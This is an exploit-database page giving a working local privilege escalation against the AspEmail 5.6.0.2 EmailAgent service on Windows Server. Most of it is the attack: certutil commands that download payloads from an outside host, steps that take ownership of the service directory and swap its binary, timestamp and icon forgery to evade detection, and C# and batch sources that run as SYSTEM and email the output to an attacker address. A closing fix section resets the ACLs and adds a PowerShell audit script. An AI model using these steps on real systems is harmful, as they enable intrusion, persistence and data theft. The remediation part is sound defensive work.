0day.today - Biggest Exploit Database in the World.
AspEmail 5.6.0.2 Weak Permissions / Local Privilege Escalation Vulnerability
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation
#
# Vulnerability Category: [Weak Service Permissions - Binary Permission Vulnerability]
#
# Date: 13/04/2023
#
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
#
# Vendor Homepage: https://www.aspemail.com
#
# Software Link: https://www.aspemail.com/download.html
#
# Product: AspEmail
#
# Version: AspEmail 5.6.0.2 and all
#
# Platform - Architecture: Windows - 32-bit | 64-bit | Any CPU
#
# Tested on: Windows Server 2016 and Windows Server 2019
#
# CVE: 0DAY
#
####################################################################################################################
# ==================================================================================================================

[+] C:\PenTest>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

* We start as an ordinary user: no SeDebug, SeTakeOwnership or SeBackup privilege, so nothing in this list gives us elevation by itself.
# ==================================================================================================================
* First, we test whether the AspEmail service is active.
* We list the running processes as a normal user and check whether the process of the relevant service is running:

[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe                4400 Persits Software EmailAgent

or

[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe              4400 Persits Software EmailAgent

* The process of the "Persits Software EmailAgent" service is in state RUNNING, so the AspEmail service is active.
# ==================================================================================================================
* We will need these:

[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe"   <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"

* Note that the first two downloads are written straight into the service's BIN directory as an ordinary user. That write succeeding is already the vulnerability; everything below only confirms it and turns it into code execution as SYSTEM.
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Name              : Persits Software EmailAgent
ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
User              : LocalSystem
ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
                    AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes,
                    WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status            : Unknown
UserCanStart      : False
UserCanStop       : False

[+] C:\PenTest>del PrivescCheck.ps1

* PrivescCheck flags a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service: the service runs as LocalSystem, and the directory holding its binary is modifiable by Everyone. UserCanStart and UserCanStop are both False, so we cannot bounce the service ourselves; whatever we put in its place runs at the next reboot or the next time an administrator restarts it.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* We do not even have permission to read the ACL of the parent directory.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                     DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
                                                     BUILTIN\Administrators:(I)(F)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(OI)(CI)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)

* Unlike the other directories, "BIN" carries an explicit, non-inherited Everyone:(OI)(CI)(F) entry: full control for every principal, propagated to every file (OI) and subdirectory (CI) beneath it. This is the Windows equivalent of chmod 0777 (rwxrwxrwx) on Linux. The inherited BUILTIN\Users:(I)(OI)(CI)(RX) entry further down is what the directory should have looked like.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"  root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-32-544"  Win32_SID  Win32_SID  2  Administrators  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}  BUILTIN  S-1-5-32-544  16

[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* EmailAgent.exe is owned by BUILTIN\Administrators (S-1-5-32-544), i.e. it was installed by an administrator. Ownership of the file is not what protects it, though: the Everyone:(OI)(CI)(F) entry on BIN is inherited by the file, which is why we will be able to rename and replace it.
# ==================================================================================================================
* Next we take ownership of the directory, since all our operations will take place under "BIN". Everyone:(F) already includes WRITE_OWNER and WRITE_DAC, which is why takeown and ICACLS /Grant succeed without SeTakeOwnershipPrivilege; the step is not strictly required for the swap below, but it makes every later file operation predictable.

[+] C:\PenTest>whoami
DeepSecLab\Hacker

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files

* All commands succeeded. We now hold full control of this directory.
# ==================================================================================================================
* Now we swap the EmailAgent binary for a program of our own.
* We take care not to damage any file while doing this, so that everything can be undone easily afterwards.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
13.04.2023  22:00            12.288 EmailAgent.exe            <<<=== renamed from EmailAgentPrivESC.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free
# ==================================================================================================================
* Now we set the Last Modified, Creation and Last Accessed timestamps of the new file so that it blends in with its neighbours.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* Next we extract the icon of the real EmailAgent.exe and apply it to the exploit binary, which makes it harder to spot at a glance.
* I used the Resource Tuner Console tool:
  >>> http://www.restuner.com/tour-resource-tuner-console.htm
* The same can be done easily with the Resource Tuner GUI:
  >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
  >>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
24.09.2003  09:21            12.288 EmailAgent.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free

[24.09.2003 09:21]  12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe

* Timestamp manipulation is done: both files now look as if they were installed together, long ago. Keep in mind what this does not hide: setfiletime only rewrites the $STANDARD_INFORMATION timestamps that dir shows, the $FILE_NAME timestamps recorded in the MFT when the file was renamed into place still carry the 2023 date, and the size difference (12.288 bytes against 167.936 for the genuine binary) is obvious to anyone who compares the two.
# ==================================================================================================================
* Now we check the ownership of our binary.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  Win32_SID  Win32_SID  2  Hacker  {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}  DeepSecLab  S-1-5-21-3674093405-176013069-2091862131-1511  28

[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker

EmailAgent.exe Owner: DeepSecLab\Hacker

* The owner is now our user, because the file in place is the one we created. The ACL reset in the [FIX] section removes the explicit Everyone entry but does not change this owner; an owner that is not Administrators, SYSTEM or TrustedInstaller on a file under Program Files is itself a good hunting indicator.
# =================================================================================================================#
#                                                                                                                  #
####################################################################################################################
#[EmailAgent.cs]#
####################################################################################################################

* The program is written so that when the server reboots (i.e. when services are restarted) it is started by the SCM in place of the real service binary,
* executes the commands we want as LocalSystem,
* and then mails the output to an address we control.

* Two things differ from the listing as originally published: the original called a "Cli" helper class that was never shown, so cmd.exe is driven through System.Diagnostics.Process directly; and Run.bat is executed before Mail.exe, because Mail.exe attaches the Export.txt that Run.bat writes. The transcript file name Trigger.txt stands in for the original ToFile(@"C:\Windows\Temp\") call and is my choice.

// EmailAgent.cs - compiled as a console application and dropped over the service binary.
using System;
using System.Diagnostics;
using System.IO;

namespace CliToolSpace
{
    class _Main
    {
        // Run one command line under cmd.exe /c, wait for it to finish and return its stdout.
        static string RunCmd(string commandLine)
        {
            var psi = new ProcessStartInfo("cmd.exe", "/c " + commandLine)
            {
                UseShellExecute = false,
                RedirectStandardOutput = true,
                CreateNoWindow = true
            };
            using (var p = Process.Start(psi))
            {
                string output = p.StandardOutput.ReadToEnd();
                p.WaitForExit();
                return output;
            }
        }

        static void Main(string[] args)
        {
            // 1. Run.bat records whoami into Export.txt and puts the genuine EmailAgent.exe back.
            string log = RunCmd(@"C:\Windows\Temp\Run.bat");
            // 2. Mail.exe mails Export.txt to us.
            log += RunCmd(@"C:\Windows\Temp\Mail.exe");
            // 3. Keep a local transcript, then remove the two stagers.
            File.WriteAllText(@"C:\Windows\Temp\Trigger.txt", log);
            File.Delete(@"C:\Windows\Temp\Run.bat");
            File.Delete(@"C:\Windows\Temp\Mail.exe");
        }
    }
}

####################################################################################################################
#[Mail.cs]#
####################################################################################################################

// Mail.cs - top-level-statements program (C# 9 / .NET 5 or later). smtp.deepseclab.com, the
// addresses and the password are placeholders; replace them with a mailbox you control.
using System;
using System.Net;
using System.Net.Mail;

SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
var mail = new MailMessage();
mail.From = new MailAddress("mail@deepseclab.com");
mail.To.Add("mail@hacker.com");
mail.Subject = "Trigger Successful!";
mail.IsBodyHtml = true;
string htmlBody;
htmlBody = "<strong>This server has been rebooted.</strong>";
mail.Body = htmlBody;
// Export.txt is written by Run.bat (whoami as the service account) before this program runs.
Attachment attachment;
attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
mail.Attachments.Add(attachment);
SmtpServer.Port = 587;                 // submission port, STARTTLS via EnableSsl
SmtpServer.UseDefaultCredentials = false;   // must be set before Credentials, or it clears them
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com", "p@ssw0rd123");
SmtpServer.EnableSsl = true;
SmtpServer.Timeout = int.MaxValue;
SmtpServer.Send(mail);

####################################################################################################################
#[Run.bat]#
####################################################################################################################

@echo off
rem Run.bat - executed by the swapped EmailAgent.exe, i.e. as LocalSystem.
rem 1. Record the account we are running as.
whoami > C:\Windows\Temp\Export.txt
rem 2. Put the genuine service binary back. The listing as originally published used
rem    "del EmailAgent.exe" here, but EmailAgent.exe is the running process at this point and
rem    a mapped image cannot be deleted; it can be renamed, so park it as .old and remove that
rem    copy by hand once the service has been restarted with the genuine binary.
cd /d "C:\Program Files (x86)\Persits Software\AspEmail\Bin"
ren EmailAgent.exe EmailAgent.exe.old
ren Null.EmailAgent.exe EmailAgent.exe
rem 3. Mail.exe and Run.bat live in C:\Windows\Temp (the original listing changed directory to
rem    C:\Windows\Tasks, where they were never placed); EmailAgent.exe deletes them itself after
rem    Mail.exe has sent Export.txt, so nothing is removed here.

####################################################################################################################

[+] Trigger Successful! [+]

[+] C:\PenTest>systeminfo | findstr "Boot Time"
System Boot Time:          13.04.2022, 07:46:06

####################################################################################################################
#[Export.txt]#
####################################################################################################################

NT AUTHORITY\SYSTEM

####################################################################################################################
# ==================================================================================================================
# ...|||[FIX]|||...
# ==================================================================================================================
[+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Persits Software EmailAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Persits Software EmailAgent
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Persits Software EmailAgent
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS

* The service object itself is sound: its DACL (sc sdshow, confirmed by accesschk) grants write access only to SYSTEM and Administrators, Interactive and Service users get read/query rights only, and the binary path is quoted. The weakness is purely the file-system ACL on BIN, so that is what we reset.
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

* /RESET discards every explicit ACE under "Persits Software" (including the rogue Everyone:(OI)(CI)(F)) and replaces it with the ACEs inherited from C:\Program Files (x86): read and execute for Users, full control for SYSTEM, Administrators and TrustedInstaller. Save the current ACLs first (ICACLS "C:\Program Files (x86)\Persits Software" /SAVE acl.bak /T /C) in case the vendor ships an intentional ACE you have to restore, and verify the result as the low-privilege user, which is what the next command does:

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.

DONE!
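The PrivescCheck / ICACLS enumeration above and the ICACLS /RESET fix are two halves of one routine: find every service whose binary, or the directory holding it, can be modified by a low-privilege principal, and then reset the tree while proving the reset worked. The following PowerShell is an added example written for this page, not code from the advisory, from PrivescCheck or from Persits Software. The function names, the set of "low-privilege" SIDs, the write-class rights mask and the backup file location are my choices; it assumes Windows PowerShell 5.1 or later on Windows, an ordinary user for the audit and an elevated prompt for the repair.

```powershell
# Added example: audit service binaries for weak file-system ACLs and apply the /RESET fix with a backup.

# Principals every local user is a member of (Everyone, Authenticated Users, INTERACTIVE, BUILTIN\Users).
$script:LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545')

# Rights that let a principal replace, delete or re-ACL the object; Modify and FullControl contain all of them.
$script:WriteBits = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                          [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                          [System.Security.AccessControl.FileSystemRights]::Delete -bor
                          [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
                          [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                          [System.Security.AccessControl.FileSystemRights]::TakeOwnership)
# Generic rights (GENERIC_WRITE | GENERIC_ALL) show up un-mapped on some inherit-only ACEs.
$script:GenericWrite = 0x40000000 -bor 0x10000000

function Get-WeakAce {
    # Allow ACEs on $Path that grant write-class rights to a low-privilege principal.
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                       # orphaned or unresolvable SID
        if ($script:LowPrivSids -notcontains $sid) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band $script:WriteBits) -or ($rights -band $script:GenericWrite)) {
            [pscustomobject]@{ Path = $Path; Identity = $ace.IdentityReference.Value
                               Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited }
        }
    }
}

function Get-ServiceBinaryPath {
    # Pull the executable out of a PathName such as
    #   "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
    #   C:\Windows\system32\svchost.exe -k netsvcs
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return $p.Substring(1, $p.IndexOf('"', 1) - 1) }
    if ($p -match '^(?<exe>.+?\.(exe|sys|dll))(\s|$)') { return $Matches.exe }
    return ($p -split '\s+')[0]
}

function Get-WritableServiceBinary {
    # One row per (service, binary or its directory, weak ACE). Unreadable ACLs are warned about, not skipped silently.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        foreach ($target in @($exe, (Split-Path -LiteralPath $exe -Parent))) {
            try { $weak = @(Get-WeakAce -Path $target) }
            catch { Write-Warning "$($svc.Name): cannot read ACL of $target ($($_.Exception.Message))"; continue }
            foreach ($w in $weak) {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Target = $target
                                   Identity = $w.Identity; Rights = $w.Rights; Inherited = $w.Inherited }
            }
        }
    }
}

function Repair-ServiceBinaryAcl {
    # Same fix as the advisory (ICACLS /RESET /T), with a restorable backup and a re-check.
    # Refuses to run when the parent directory is itself weak: /RESET would only inherit that weakness.
    param([Parameter(Mandatory)][string]$Directory,
          [string]$Backup = (Join-Path $env:TEMP ('acl-backup-{0:yyyyMMdd-HHmmss}.txt' -f (Get-Date))))
    $parent = Split-Path -LiteralPath $Directory -Parent
    $parentWeak = @(Get-WeakAce -Path $parent)
    if ($parentWeak) { throw "Parent $parent is writable by $($parentWeak.Identity -join ', '); fix it first." }
    & icacls.exe $Directory /save $Backup /T /Q /C | Out-Null      # restore with: icacls <parent> /restore <Backup>
    & icacls.exe $Directory /reset /T /Q /C | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "icacls /reset failed with exit code $LASTEXITCODE" }
    $after = @(Get-WeakAce -Path $Directory) +
             @(Get-ChildItem -LiteralPath $Directory -Recurse -Force | ForEach-Object { Get-WeakAce -Path $_.FullName })
    [pscustomobject]@{ Directory = $Directory; Backup = $Backup; RemainingWeakAces = $after.Count }
}

# Audit as the ordinary user; on the host in the advisory the BIN directory shows up with Everyone / FullControl.
Get-WritableServiceBinary | Where-Object { $_.RunsAs -eq 'LocalSystem' } | Format-Table -AutoSize

# Repair from an elevated prompt, same scope as the advisory's ICACLS /RESET:
# Repair-ServiceBinaryAcl -Directory 'C:\Program Files (x86)\Persits Software'
```

Get-Acl reads the DACL as stored, so the audit reports the ACE that grants the right rather than the caller's effective access; run it as the low-privilege account (or cross-check with accesschk -wud) if you need effective permissions. The repair deliberately checks the parent before resetting, because an install under a world-writable root would be handed the same problem back by inheritance.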
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* These two commands are optional. The ACL reset alone closes the hole; stop and restart the service only if you also had to put the genuine EmailAgent.exe back and want it loaded now rather than at the next reboot.
# ==================================================================================================================

# 0day.today [2024-09-28] #